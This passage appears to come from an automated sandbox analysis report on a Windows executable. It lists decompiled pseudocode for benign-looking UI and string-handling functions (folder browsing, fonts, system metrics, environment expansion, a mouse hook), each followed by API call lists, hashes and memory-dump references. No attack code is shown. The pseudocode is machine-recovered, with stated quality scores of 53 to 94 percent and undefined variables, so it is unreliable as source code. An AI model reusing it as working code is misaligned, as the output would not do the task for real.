                                          0x00408851
                                          0x00408854
                                          0x0040885d

                                          APIs
                                            • Part of subcall function 00408491: GetSystemMetrics.USER32 ref: 004084B9
                                            • Part of subcall function 00408491: GetSystemMetrics.USER32 ref: 004084C0
                                          • GetSystemMetrics.USER32 ref: 0040877C
                                          • GetSystemMetrics.USER32 ref: 0040878D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00408854
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MetricsSystem$??3@
                                          • String ID: 100%%
                                          • API String ID: 2562992111-568723177
                                          • Opcode ID: 215862bf18c0b19acf3a5a04a03fef2e0f3c712f031a6f0c4fe28fba1ed1db42
                                          • Instruction ID: 10e9ef11b9d6995cf4d40546f1a555f884e94b1a38fc22ac62b53fc30b8b1b4d
                                          • Opcode Fuzzy Hash: 215862bf18c0b19acf3a5a04a03fef2e0f3c712f031a6f0c4fe28fba1ed1db42
                                          • Instruction Fuzzy Hash: 1231B471A007059FCB20EFA9DA419AFB7F4EF50304B10052ED582A25D1DB78FE45CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408611, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E00408611(void* __ecx) {
				signed int _v8;
				intOrPtr _v24;
				void _v40;
				char _v564;
				intOrPtr* _t20;
				char* _t22;
				signed int _t24;
				signed int _t30;
				intOrPtr* _t38;
				void* _t39;

				_t39 = __ecx;
				_t30 = 8;
				memset( &_v40, 0, _t30 << 2);
				_v40 =  *((intOrPtr*)(_t39 + 4));
				_t20 =  &_v40;
				_v24 = 0x41;
				__imp__SHBrowseForFolderW(_t20);
				_t38 = _t20;
				if(_t38 != 0) {
					_v564 = 0;
					_t22 =  &_v564;
					__imp__SHGetPathFromIDListW(_t38, _t22);
					if(_t22 != 0) {
						E00414864(0x42289c,  &_v564);
						E004085BD();
					}
					_v8 = _v8 & 0x00000000;
					_t20 =  &_v8;
					__imp__SHGetMalloc(_t20);
					if(_t20 == 0) {
						_t20 = _v8;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x14))(_t20, _t38);
							_t24 = _v8;
							return  *((intOrPtr*)( *_t24 + 8))(_t24);
						}
					}
				}
				return _t20;
			}













                                          0x0040861c
                                          0x00408622
                                          0x00408626
                                          0x0040862b
                                          0x0040862e
                                          0x00408632
                                          0x00408639
                                          0x0040863f
                                          0x00408643
                                          0x00408647
                                          0x0040864e
                                          0x00408656
                                          0x0040865e
                                          0x0040866c
                                          0x00408673
                                          0x00408673
                                          0x00408678
                                          0x0040867c
                                          0x00408680
                                          0x00408688
                                          0x0040868a
                                          0x0040868f
                                          0x00408695
                                          0x00408698
                                          0x00000000
                                          0x0040869e
                                          0x0040868f
                                          0x00408688
                                          0x004086a4

                                          APIs
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00408639
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00408656
                                          • SHGetMalloc.SHELL32(00000000), ref: 00408680
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085D3
                                            • Part of subcall function 004085BD: SetFocus.USER32(00000000,?,?,?,?,00408678,?), ref: 004085D6
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085E6
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085FB
                                            • Part of subcall function 004085BD: SendMessageW.USER32(00000000,000000B1,0000002C,0000002C), ref: 00408605
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Item$??2@??3@BrowseFocusFolderFromListMallocMessagePathSendmemcpy
                                          • String ID: A
                                          • API String ID: 593732027-3554254475
                                          • Opcode ID: abef69c3a689c6693ae1daabc196967bfb947067b108d8514785a3976a152fcc
                                          • Instruction ID: 334bb033f33a0169e89b3c4095cf3bc58b16b71e79b7d68a569bb45045dcd683
                                          • Opcode Fuzzy Hash: abef69c3a689c6693ae1daabc196967bfb947067b108d8514785a3976a152fcc
                                          • Instruction Fuzzy Hash: 1A117375A10114ABDB10DBA5CA48AEE77FDAF88701F1044BEE405E3280DF79DE05CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408345, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E00408345(void* __ecx) {
				char _v16;
				short _v528;
				void* _t16;
				WCHAR* _t26;
				void* _t28;

				_t28 = __ecx;
				E00414839( &_v16, __ecx + 0x3c);
				if( *((intOrPtr*)(__ecx + 0x48)) > 0) {
					_t26 = 0x1d;
					wsprintfW( &_v528, L" (%d%s)",  *((intOrPtr*)(__ecx + 0x48)), E00403CE0(_t26));
					E00414922( &_v16,  &_v528);
				}
				_t16 = E0040790B(GetDlgItem( *(_t28 + 4),  *(_t28 + 0x4c)), _v16);
				_push(_v16);
				L0041C160();
				return _t16;
			}








                                          0x0040834f
                                          0x00408358
                                          0x00408361
                                          0x00408365
                                          0x0040837b
                                          0x0040838e
                                          0x0040838e
                                          0x004083a6
                                          0x004083ab
                                          0x004083ae
                                          0x004083b6

                                          APIs
                                            • Part of subcall function 00414839: memcpy.MSVCRT ref: 00414855
                                          • wsprintfW.USER32 ref: 0040837B
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                          • GetDlgItem.USER32 ref: 0040839D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004083AE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: memcpy$??3@Itemwsprintf
                                          • String ID: (%d%s)
                                          • API String ID: 1424909225-2087557067
                                          • Opcode ID: 4c2e4abf8fb0949f687d944acbe7981161a7f97eff8663cb11372a1bea16929d
                                          • Instruction ID: 1095c0e5d4e8a60263cd01f69a665fc3e98801ae7abcb9bbd600e73924aed479
                                          • Opcode Fuzzy Hash: 4c2e4abf8fb0949f687d944acbe7981161a7f97eff8663cb11372a1bea16929d
                                          • Instruction Fuzzy Hash: BAF0A9B18002187FDB21BB55DC06EDE77BCEF04704F10456BB552A1492DB75AA448B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040457E, Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E0040457E(signed short** __ecx, void* __edi, void* __eflags) {
				signed short* _v8;
				signed short** _v12;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				void* _t30;
				void* _t33;
				signed int _t37;
				void* _t39;
				signed int _t46;
				signed int _t66;
				signed short* _t72;

				_v12 = __ecx;
				E004147DF(_t30,  &_v24);
				_t72 =  *__ecx;
				_t46 =  *_t72 & 0x0000ffff;
				if(_t46 != 0) {
					_v8 =  &(_t72[2]);
					do {
						if(_t46 != 0x7e) {
							L10:
							E00401585( &_v24, _t46);
							_t72 =  &(_t72[1]);
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
						} else {
							_t66 = _t72[1] & 0x0000ffff;
							_t76 = _t66 - 0x78;
							if(_t66 != 0x78) {
								L6:
								__eflags = _t66 - 0x58;
								if(__eflags != 0) {
									goto L10;
								} else {
									_t68 = E004032FD(_v8, __eflags);
									__eflags = _t36;
									if(__eflags < 0) {
										goto L10;
									} else {
										_t37 = E004032FD( &(_t72[4]), __eflags);
										__eflags = _t37;
										if(_t37 < 0) {
											goto L10;
										} else {
											E00401585( &_v24, _t68 << 0x00000008 | _t37);
											_t72 =  &(_t72[6]);
											_v8 =  &(_v8[6]);
										}
									}
								}
							} else {
								_t39 = E004032FD(_v8, _t76);
								_t77 = _t39;
								if(_t39 < 0) {
									goto L6;
								} else {
									E004147DF(E004143E4( &_v48, _t39),  &_v36);
									E004148C7( &_v36, E00404346( &_v60,  &_v48, _t77, 0));
									_push(_v60);
									L0041C160();
									E00414962( &_v24, _t77,  &_v36);
									_push(_v36);
									_v8 =  &(_v8[4]);
									_t72 =  &(_t72[4]);
									L0041C160();
									_push(_v48);
									L0041C160();
								}
							}
						}
						_t46 =  *_t72 & 0x0000ffff;
					} while (_t46 != 0);
				}
				_t33 = E004148C7(_v12,  &_v24);
				_push(_v24);
				L0041C160();
				return _t33;
			}
















                                          0x0040458b
                                          0x0040458e
                                          0x00404593
                                          0x00404595
                                          0x0040459b
                                          0x004045a4
                                          0x004045a8
                                          0x004045ac
                                          0x00404654
                                          0x00404658
                                          0x0040465d
                                          0x00404660
                                          0x00404660
                                          0x00404660
                                          0x004045b2
                                          0x004045b2
                                          0x004045b6
                                          0x004045b9
                                          0x0040461e
                                          0x0040461e
                                          0x00404621
                                          0x00000000
                                          0x00404623
                                          0x0040462b
                                          0x0040462d
                                          0x0040462f
                                          0x00000000
                                          0x00404631
                                          0x00404634
                                          0x00404639
                                          0x0040463b
                                          0x00000000
                                          0x0040463d
                                          0x00404646
                                          0x0040464b
                                          0x0040464e
                                          0x0040464e
                                          0x0040463b
                                          0x0040462f
                                          0x004045bb
                                          0x004045be
                                          0x004045c3
                                          0x004045c5
                                          0x00000000
                                          0x004045c7
                                          0x004045d3
                                          0x004045e9
                                          0x004045ee
                                          0x004045f1
                                          0x004045fe
                                          0x00404603
                                          0x00404606
                                          0x0040460a
                                          0x0040460d
                                          0x00404612
                                          0x00404615
                                          0x0040461b
                                          0x004045c5
                                          0x004045b9
                                          0x00404664
                                          0x00404667
                                          0x00404670
                                          0x00404678
                                          0x0040467d
                                          0x00404680
                                          0x00404689

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404680
                                            • Part of subcall function 00404346: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000000,004045E5,00000000,00000000,?,73B749F0,00000000), ref: 00404372
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004045F1
                                            • Part of subcall function 00414962: memcpy.MSVCRT ref: 00414985
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040460D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404615
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@memcpy$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1626065140-0
                                          • Opcode ID: 92b2269dcbb5469a7374e5d0293862210f50a6874d1cdadc034233de0de85a53
                                          • Instruction ID: b0a0a81bb6a2256ad0cd8ca21ba2997bb0ff50e184d4d55abff6c389da77fbe6
                                          • Opcode Fuzzy Hash: 92b2269dcbb5469a7374e5d0293862210f50a6874d1cdadc034233de0de85a53
                                          • Instruction Fuzzy Hash: DB3172B2D001199BCB10FBA5CC928EEB7B4AEA1719B10047FE911731D1EF3D5E44DA28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407803, Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E00407803(intOrPtr* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v16;
				char _v24;
				struct tagLOGFONTW _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				void _v524;
				intOrPtr* _t27;
				void* _t33;
				intOrPtr* _t41;
				intOrPtr _t43;

				_v8 = _v8 & 0x00000000;
				_t41 = __ecx;
				_v524 = 0x1f4;
				if(SystemParametersInfoW(0x29, 0x1f4,  &_v524, 0) != 0) {
					_t43 =  *((intOrPtr*)(_t41 + 0x1c)) + _v508 - 0x1a;
					if(( *0x42245c & 0x00000200) == 0) {
						_t43 = _t43 + GetSystemMetrics(0x31);
					}
					_t33 = CreateFontIndirectW( &_v500);
					if(_t33 != 0) {
						_push(0x860);
						_push(_t33);
						_push( &_v24);
						_push(_a4);
						if( *((intOrPtr*)( *_t41 + 8))() != 0) {
							_t43 = _t43 + _v16;
							_v8 = 1;
						}
						DeleteObject(_t33);
					}
					_t27 = _a8;
					 *_t27 = _t43;
					 *((intOrPtr*)(_t27 + 4)) = _v504;
				}
				return _v8;
			}














                                          0x0040780c
                                          0x00407813
                                          0x00407824
                                          0x00407832
                                          0x00407849
                                          0x0040784d
                                          0x00407857
                                          0x00407857
                                          0x00407866
                                          0x0040786a
                                          0x0040786e
                                          0x00407873
                                          0x00407877
                                          0x00407878
                                          0x00407882
                                          0x00407884
                                          0x00407887
                                          0x00407887
                                          0x0040788f
                                          0x0040788f
                                          0x00407895
                                          0x0040789e
                                          0x004078a1
                                          0x004078a4
                                          0x004078aa

                                          APIs
                                          • SystemParametersInfoW.USER32 ref: 0040782A
                                          • GetSystemMetrics.USER32 ref: 00407851
                                          • CreateFontIndirectW.GDI32(?), ref: 00407860
                                          • DeleteObject.GDI32(00000000), ref: 0040788F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                          • String ID:
                                          • API String ID: 1900162674-0
                                          • Opcode ID: 6b0baed25e051eef8abb3c10058c87645c9df880ae66aa92677688f43f21874f
                                          • Instruction ID: 6ed76f481bb13851b2ba6c7269299cba647cb843460d982c1d226789c05f16d1
                                          • Opcode Fuzzy Hash: 6b0baed25e051eef8abb3c10058c87645c9df880ae66aa92677688f43f21874f
                                          • Instruction Fuzzy Hash: 6E1133B6E00219EFDB109F54DD88FEAB7B8EB08304F04806AED15A7291DB74AE44CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040BFD0, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E0040BFD0(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _t16;
				intOrPtr* _t21;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;

				_t34 = __ecx;
				_t1 = _t34 + 8; // 0x0
				_t16 =  *_t1;
				if(_t16 >=  *__ecx) {
					_t2 = _t34 + 4; // 0x0
					_t33 =  *((intOrPtr*)( *_t2 + _t16 * 4 - 4));
					if(_t33 != 0) {
						_t16 =  *(_t33 + 0x18);
						_push(_t16);
						L0041C160();
						_push(_t33);
						L0041C160();
						_t35 = _t35 + 8;
					}
					 *(_t34 + 8) =  *(_t34 + 8) - 1;
				}
				_push(0x40);
				L0041C16C();
				if(_t16 == 0) {
					_t32 = 0;
				} else {
					_t32 = E0040BB60(_t16, _a4);
				}
				_t10 = _t34 + 4; // 0x42262c
				E0041B15E(_t10);
				_t11 = _t34 + 8; // 0x0
				_t12 = _t34 + 4; // 0x0
				memmove( *_t12 + 4,  *_t12,  *_t11 +  *_t11 +  *_t11 +  *_t11);
				_t13 = _t34 + 4; // 0x0
				_t21 =  *_t13;
				 *_t21 = _t32;
				 *(_t34 + 8) =  *(_t34 + 8) + 1;
				return _t21;
			}









                                          0x0040bfd1
                                          0x0040bfd3
                                          0x0040bfd3
                                          0x0040bfd9
                                          0x0040bfdb
                                          0x0040bfe0
                                          0x0040bfe6
                                          0x0040bfe8
                                          0x0040bfeb
                                          0x0040bfec
                                          0x0040bff1
                                          0x0040bff2
                                          0x0040bff7
                                          0x0040bff7
                                          0x0040bffa
                                          0x0040bffa
                                          0x0040bffd
                                          0x0040bfff
                                          0x0040c009
                                          0x0040c01b
                                          0x0040c00b
                                          0x0040c017
                                          0x0040c017
                                          0x0040c01d
                                          0x0040c020
                                          0x0040c025
                                          0x0040c028
                                          0x0040c035
                                          0x0040c03b
                                          0x0040c03b
                                          0x0040c041
                                          0x0040c043
                                          0x0040c048

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@memmove
                                          • String ID:
                                          • API String ID: 1826340609-0
                                          • Opcode ID: 8e7532886ac6f132fb31c5bc599489b9f27b5be55b701efbb96b8b47ac8e95ed
                                          • Instruction ID: 28c01599a8efab726e8a96f9add3700168d0e8d0987dbb03bf4d91f07539ccee
                                          • Opcode Fuzzy Hash: 8e7532886ac6f132fb31c5bc599489b9f27b5be55b701efbb96b8b47ac8e95ed
                                          • Instruction Fuzzy Hash: E3015276600601ABC2209B59DC8199773F5EFC4714705853DF85A93745DB38EC528BAC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404475, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00404475(WCHAR** __ecx) {
				char _v16;
				void* _t8;
				long _t11;
				long _t12;
				void* _t17;
				void* _t29;
				WCHAR* _t30;
				WCHAR** _t32;

				_t32 = __ecx;
				E004147DF(_t8,  &_v16);
				_t30 =  *__ecx;
				_t11 = ExpandEnvironmentStringsW(_t30, E0040420B( &_v16, _t29, 1), 1);
				if(_t11 != 0) {
					_t12 = _t11 + 1;
					ExpandEnvironmentStringsW( *_t32, E0040420B( &_v16, _t29, _t12), _t12);
					E004041F0( &_v16);
					_t17 = E004148C7(_t32,  &_v16);
					_push(_v16);
					L0041C160();
					return _t17;
				}
				_push(_v16);
				L0041C160();
				return _t11;
			}











                                          0x0040447c
                                          0x00404482
                                          0x00404487
                                          0x0040449d
                                          0x004044a1
                                          0x004044b1
                                          0x004044be
                                          0x004044c3
                                          0x004044ce
                                          0x004044d3
                                          0x004044d6
                                          0x00000000
                                          0x004044dc
                                          0x004044a3
                                          0x004044a6
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 0040420B: wcsncpy.MSVCRT ref: 00404239
                                            • Part of subcall function 0040420B: ??3@YAXPAX@Z.MSVCRT ref: 00404244
                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,?), ref: 0040449D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004044A6
                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000), ref: 004044BE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004044D6
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$EnvironmentExpandStrings$??2@wcsncpy
                                          • String ID:
                                          • API String ID: 3034541985-0
                                          • Opcode ID: c886345f42a89e38147d86890f6206be9fc0e1e3ef2aa4462b3c4a99f6da78c6
                                          • Instruction ID: 6aaab2933dda83b848260475bd0ce4bd17d474790b6213925c89a090bfd6a3a1
                                          • Opcode Fuzzy Hash: c886345f42a89e38147d86890f6206be9fc0e1e3ef2aa4462b3c4a99f6da78c6
                                          • Instruction Fuzzy Hash: 69F086B19001087ED714B755EC52DEE73BCDF80714B20417FF511B2092DB746D458A68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408CE2, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00408CE2(int _a4, int _a8, struct tagPOINT* _a12) {
				struct tagRECT _v20;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr* _t23;
				struct tagPOINT* _t25;

				_t11 =  *0x4228b4; // 0x0
				if(_t11 == 0) {
					return 0;
				}
				_t25 = _a12;
				if( *((intOrPtr*)(_t11 + 0x48)) <= 0) {
					L9:
					return CallNextHookEx( *0x4228b8, _a4, _a8, _t25);
				}
				_t21 =  *0x422600; // 0x202
				_t23 = 0x422600;
				while(_t21 != 0) {
					if(_t21 == _a8) {
						ScreenToClient( *(_t11 + 4), _t25);
						_t16 =  *0x4228b4; // 0x0
						GetClientRect( *(_t16 + 4),  &_v20);
						_push(_t25->y);
						if(PtInRect( &_v20,  *_t25) != 0) {
							_t22 =  *0x4228b4; // 0x0
							E0040846F(_t22);
						}
						goto L9;
					}
					_t23 = _t23 + 4;
					_t21 =  *_t23;
				}
				goto L9;
			}










                                          0x00408ce5
                                          0x00408cef
                                          0x00000000
                                          0x00408d68
                                          0x00408cf6
                                          0x00408cf9
                                          0x00408d52
                                          0x00000000
                                          0x00408d65
                                          0x00408cfb
                                          0x00408d01
                                          0x00408d12
                                          0x00408d0b
                                          0x00408d1c
                                          0x00408d26
                                          0x00408d2e
                                          0x00408d34
                                          0x00408d45
                                          0x00408d47
                                          0x00408d4d
                                          0x00408d4d
                                          0x00000000
                                          0x00408d45
                                          0x00408d0d
                                          0x00408d10
                                          0x00408d10
                                          0x00000000

                                          APIs
                                          • ScreenToClient.USER32 ref: 00408D1C
                                          • GetClientRect.USER32 ref: 00408D2E
                                          • PtInRect.USER32(?,?,?), ref: 00408D3D
                                            • Part of subcall function 0040846F: KillTimer.USER32(?,00000001,?,00408D52), ref: 0040847D
                                          • CallNextHookEx.USER32 ref: 00408D5F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ClientRect$CallHookKillNextScreenTimer
                                          • String ID:
                                          • API String ID: 3015594791-0
                                          • Opcode ID: 993c2614d7880d53dfabe33bba4063a44cb0ef45497057784dd9015b7f499a48
                                          • Instruction ID: 3a3e0b2ee197b87f3047a46ed79295dbf0db4e011d250cd12eb6af0489ec551e
                                          • Opcode Fuzzy Hash: 993c2614d7880d53dfabe33bba4063a44cb0ef45497057784dd9015b7f499a48
                                          • Instruction Fuzzy Hash: 8001AD31200109EFDF24EF64DE45EAA7BA5FF14300704863EE895A22B0DB78E811DB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414529, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00414529(void** __ecx, void* _a4) {
				void* _v0;
				void* _v20;
				signed int _t29;
				void* _t33;
				void* _t36;
				void* _t38;
				void* _t39;
				void** _t40;
				signed int _t51;
				signed int _t53;
				void* _t55;
				signed int _t56;
				void** _t57;
				void** _t58;
				void* _t64;

				_t40 = __ecx;
				_t55 = _a4;
				_t57 = __ecx;
				if(_t55 < __ecx[1]) {
					L3:
					_push(0x41fbdc);
					_push( &_a4);
					_a4 = 0x13329ad;
					L0041C310();
					asm("int3");
					_t38 = _v20;
					_push(_t57);
					_push(_t55);
					_t58 = _t40;
					__eflags = _t38 - 0x40000000;
					if(__eflags >= 0) {
						_push(0x41fbdc);
						_push( &_v0);
						_v0 = 0x13329ad;
						L0041C310();
					}
					_t51 = 2;
					_t19 = _t38 + 1; // 0x13329ae
					_t29 = _t19 * _t51;
					_push( ~(0 | __eflags > 0x00000000) | _t29);
					L0041C16C();
					_t56 = _t29;
					__eflags = 0;
					 *_t56 = 0;
					_push( *_t58);
					L0041C160();
					 *_t58 = _t56;
					_t58[2] = _t38;
					return 0;
				} else {
					_t64 = _t55 - 0x40000000;
					if(_t64 >= 0) {
						goto L3;
					} else {
						_t53 = 2;
						_t33 = (_t55 + 1) * _t53;
						_push( ~(0 | _t64 > 0x00000000) | _t33);
						L0041C16C();
						_t39 = _t33;
						_t36 = memcpy(_t39,  *__ecx, __ecx[1] + __ecx[1] + 2);
						_push( *_t57);
						L0041C160();
						_t57[2] = _t55;
						 *_t57 = _t39;
						return _t36;
					}
				}
			}


















                                          0x00414529
                                          0x0041452f
                                          0x00414532
                                          0x00414537
                                          0x00414580
                                          0x00414580
                                          0x00414588
                                          0x00414589
                                          0x00414590
                                          0x00414595
                                          0x0041459a
                                          0x0041459d
                                          0x0041459e
                                          0x0041459f
                                          0x004145a1
                                          0x004145a7
                                          0x004145a9
                                          0x004145b1
                                          0x004145b2
                                          0x004145b9
                                          0x004145b9
                                          0x004145c2
                                          0x004145c3
                                          0x004145c6
                                          0x004145cf
                                          0x004145d0
                                          0x004145d5
                                          0x004145d7
                                          0x004145d9
                                          0x004145dc
                                          0x004145de
                                          0x004145e5
                                          0x004145e8
                                          0x004145ee
                                          0x00414539
                                          0x00414539
                                          0x0041453f
                                          0x00000000
                                          0x00414541
                                          0x00414545
                                          0x00414549
                                          0x00414552
                                          0x00414553
                                          0x00414558
                                          0x00414565
                                          0x0041456a
                                          0x0041456c
                                          0x00414574
                                          0x00414578
                                          0x0041457d
                                          0x0041457d
                                          0x0041453f

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@ExceptionThrowmemcpy
                                          • String ID:
                                          • API String ID: 3462485524-0
                                          • Opcode ID: fbf67506e7b852d834da6b769d7c2a1f77e85b85f8e58d34c54b7bbeba27a539
                                          • Instruction ID: bad1208c822c5cb59acc694e3c3e07b52318d6ca9f25ae31226294b0ebccef01
                                          • Opcode Fuzzy Hash: fbf67506e7b852d834da6b769d7c2a1f77e85b85f8e58d34c54b7bbeba27a539
                                          • Instruction Fuzzy Hash: 14F0F9B22402047FC7149F29DC82D9BF7EDEF40758B11842FF54987102D675A8808B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416DD5, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E00416DD5(void* __ecx, signed char _a4) {
				signed int _t13;
				signed char _t15;
				signed int _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				signed int* _t28;

